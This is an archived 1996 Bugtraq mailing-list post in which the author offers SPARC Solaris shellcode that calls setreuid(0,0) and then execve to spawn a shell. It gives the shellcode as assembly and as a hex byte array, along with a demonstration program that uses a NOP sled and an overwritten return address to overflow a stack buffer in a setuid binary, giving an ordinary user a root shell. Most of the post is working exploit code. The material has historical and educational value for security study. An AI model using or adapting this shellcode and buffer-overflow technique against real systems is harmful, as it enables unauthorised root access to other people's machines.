[3732] in bugtraq
Re: /bin/ksh sparc code
daemon@ATHENA.MIT.EDU (Aaron Bornstein)
Tue Dec 3 16:50:11 1996
Date: Tue, 3 Dec 1996 15:18:19 -0500
Reply-To: Aaron Bornstein <aaronb@j51.com>
From: Aaron Bornstein <aaronb@j51.com>
X-To: zomo@home.serome.co.kr
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@netspace.org>
Our good buddy Kichang wrote the following:
> So, I made sparc code for doing something *like* execl("/bin/ksh","ksh",0).
>I know it's no big deal, almost close to lame, but I think it's kinda
That's one way to do it, but I don't like ksh. So, I decided to
modify it to do a setreuid() call before anything else. Here's the code:
--CUT HERE--solaris-setreuid-shellcode.c--CUT HERE--
/* Solaris */
main() {
__asm__ (
"mov 0xca, %g1 \n" /* 202 - setreuid() */
"xor %o1,%o1,%o1 \n"
"and %o1,%o1,%o0 \n"
"ta 8 \n"
"sethi 0xbd89a, %l6 \n"
"or %l6, 0x16e, %l6 \n"
"sethi 0xbdcda, %l7 \n"
"and %sp, %sp, %o0 \n"
"add %sp, 8, %o1 \n"
"xor %o2, %o2, %o2 \n"
"add %sp, 16, %sp \n"
"std %l6, [%sp - 16] \n"
"st %sp, [%sp - 8] \n"
"st %g0, [%sp - 4] \n"
"mov 0x3b, %g1 \n" /* 59 - execve() */
"ta 8 \n"
);
}
--CUT HERE--solaris-setreuid-shellcode.c--CUT HERE--
And a demonstration program. Usage:
# cc -o demo demo.c
# chmod 4755 demo
# su plainuser
% ./demo
#
--CUT HERE--solaris-shellcode-example1.c--CUT HERE--
#include <sys/types.h>
#define NOP 0xa61cc013
#define BUFSIZE 256
#define CODESIZE 64
char shellcode[] =
"\x82\x10\x20\xca\x92\x1a\x40\x09\x90\x0a\x40\x09\x91\xd0\x20\x08"
"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xdc\xda\x90\x0b\x80\x0e"
"\x92\x03\xa0\x08\x94\x1a\x80\x0a\x9c\x03\xa0\x10\xec\x3b\xbf\xf0"
"\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x08";
char bigbuf[BUFSIZE * 2];
u_long
get_sp()
{
__asm__("mov %sp, %i0 \n");
}
void
overflow_me()
{
char lilbuf[BUFSIZE];
u_long *lp;
char *cp;
int i;
lp = (u_long *)bigbuf;
for (i = 0 ; i < BUFSIZE - CODESIZE ; i += 4)
*lp++ = NOP;
cp = (char *)lp;
for (i = 0 ; i < CODESIZE ; i++)
*cp++ = shellcode[i];
lp = (u_long *)cp;
for (i = BUFSIZE ; i < BUFSIZE * 2 ; i += 4)
/* *lp++ = (u_long)lilbuf; */
*lp++ = get_sp() + 224;
strcpy(lilbuf, bigbuf);
}
void
main(int argc, char **argv)
{
overflow_me();
}
--CUT HERE--solaris-shellcode-example1.c--CUT HERE--
